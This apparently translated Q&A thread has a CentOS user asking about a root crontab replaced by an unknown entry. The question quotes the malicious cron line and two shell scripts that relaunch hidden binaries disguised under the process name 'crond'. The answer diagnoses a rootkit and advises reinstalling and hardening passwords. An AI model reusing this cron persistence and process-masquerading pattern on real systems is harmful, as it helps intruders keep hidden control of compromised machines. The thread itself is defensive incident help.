【问题标题】:centos: root user's crontab gets deleted and replaced - malicious code?centos:root 用户的 crontab 被删除和替换 - 恶意代码?
【发布时间】:2018-04-22 16:54:03
【问题描述】:

我正在尝试确定我的 /var/spool/crontab/root 是否被病毒或恶意代码覆盖:

我今天早上醒来,我的 /var/spool/crontab/root 文件是空的,除了这一行,不是我写的:

* * * * * /usr/home/.bash_history/update > /dev/null 2>&1

我查找了这个设置为运行的 update 文件,它包含以下内容:

#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null

该更新文件调用一个名为run的文件,其中包含:

#!/bin/bash

ARCH=`uname -m`
HIDE="crond"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./run64
fi

以下是我不认识的 /usr/home 目录的完整内容: 我正在运行centos6.8

【问题讨论】:

    标签: cron centos centos6


    【解决方案1】:

    我认为您已被黑客入侵,可能是有人使用可下载的 rootkit。任何拥有调制解调器的白痴都可以使用它们,其中许多人一旦成功入侵,甚至都不知道如何处理系统。

    您可以做的最安全的事情是从头开始重新安装操作系统,这一次使用更多更强的密码。 (抱歉,“pa$$w0rd”没有删减。)您可以尝试只更改密码并搜索系统是否有任何可疑之处,但很有可能发生了一些您永远无法识别的更改。

    我有一次系统被黑了,他们替换了“ls”、“ps”,谁知道还有什么其他命令用替代品跳过了他们的干预,这使得我们很难 100% 确定我们已经找到并且修复了他们的所有更改。

    重新安装后,查看如何将影子哈希转换为使用 SHA512。默认散列算法存储在 /etc/login.defs 中,并且可能是 MD5,目前还不够强大。但即使使用更强的哈希,许多弱密码也会很快陷入暴力攻击。

    当您使用它时,您不妨获得包含更多安全补丁的 CentOS 6.9。

    【讨论】:

      猜你喜欢
      • 2017-02-12
      • 1970-01-01
      • 1970-01-01
      • 2012-12-11
      • 2011-12-28
      • 1970-01-01
      • 1970-01-01
      • 2020-08-26
      • 1970-01-01
      相关资源
      最近更新 更多